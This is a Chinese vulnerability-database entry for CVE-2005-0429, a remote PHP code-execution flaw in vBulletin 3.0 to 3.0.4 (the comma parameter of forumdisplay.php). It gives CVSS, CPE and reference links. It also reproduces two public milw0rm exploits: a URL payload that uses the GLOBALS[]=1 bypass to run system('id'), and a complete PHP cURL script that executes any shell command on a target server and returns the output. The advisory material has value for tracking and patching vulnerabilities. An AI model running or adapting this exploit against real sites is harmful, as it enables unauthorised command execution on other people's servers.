CVE-2005-0429
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:11:36
NMCOE    

[原文]Direct code injection vulnerability in forumdisplay.php in vBulletin 3.0 through 3.0.4, when showforumusers is enabled, allows remote attackers to execute inject arbitrary PHP commands via the comma parameter.


[CNNVD]vBulletin 3.0.x PHP远程任意代码执行漏洞(CNNVD-200505-246)

        vBulletin forumdisplay.php脚本存在安全问题,远程攻击者可以利用这个漏洞以进程权限执行任意命令。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:jelsoft:vbulletin:3.0.4
cpe:/a:jelsoft:vbulletin:3.0.3
cpe:/a:jelsoft:vbulletin:3.0.2
cpe:/a:jelsoft:vbulletin:3.0
cpe:/a:jelsoft:vbulletin:3.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0429
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0429
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-246
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110840807415315&w=2
(UNKNOWN)  BUGTRAQ  20050213 vbulletin 3.0.x PHP code execution
http://www.securityfocus.com/bid/12542
(UNKNOWN)  BID  12542

- 漏洞信息

vBulletin 3.0.x PHP远程任意代码执行漏洞
中危 输入验证
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        vBulletin forumdisplay.php脚本存在安全问题,远程攻击者可以利用这个漏洞以进程权限执行任意命令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.vbulletin.com/" target="_blank"

- 漏洞信息 (818)

vBulletin <= 3.0.4 "forumdisplay.php" Code Execution (EDBID:818)
php webapps
2005-02-14 Verified
0 AL3NDALEEB
N/A [点击下载]
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

Conditions:
----------------
1st condition     : $vboptions['showforumusers'] == True , the admin must set
		    showforumusers ON in vbulletin options.

2nd condition     : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.

3rd condition     : $DB_site->fetch_array($forumusers) == True , when you
		    visit the forums, it  must has at least one user show the forum.

4th condition     : magic_quotes_gpc must be OFF

SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
		    init.php by secret array GLOBALS[]=1 ;)))

# milw0rm.com [2005-02-14]
		

- 漏洞信息 (820)

vBulletin <= 3.0.4 "forumdisplay.php" Code Execution (part 2) (EDBID:820)
php webapps
2005-02-15 Verified
0 AL3NDALEEB
N/A [点击下载]
<?php
/**************************************************************
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions['showforumusers'] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo['userid'] == 0 , you must be an visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must has at least
# one user show the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
# 
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
# 
**************************************************************/

if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}

if ($argv[3]){
$url = $argv[1];
$forumid = intval($argv[2]);
$command = $argv[3];
}
else {
echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
echo "<forumid> forum id\n";
echo "<command> command to execute on server (ex: 'ls -la')\n";
echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
echo "ex :\n";
echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";

exit;
}

if ($argv[4])
$proxy = $argv[4];



$action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';

$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.'/'.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$res = substr($res, strpos($res, '_START_')+7);
$res = substr($res,0, strpos($res, '_END_'));
echo $res;


?>

// milw0rm.com [2005-02-15]
		

- 漏洞信息

14026
vBulletin forumdisplay.php comma Parameter Arbitrary Command Execution
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-13 Unknow
2005-02-13 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站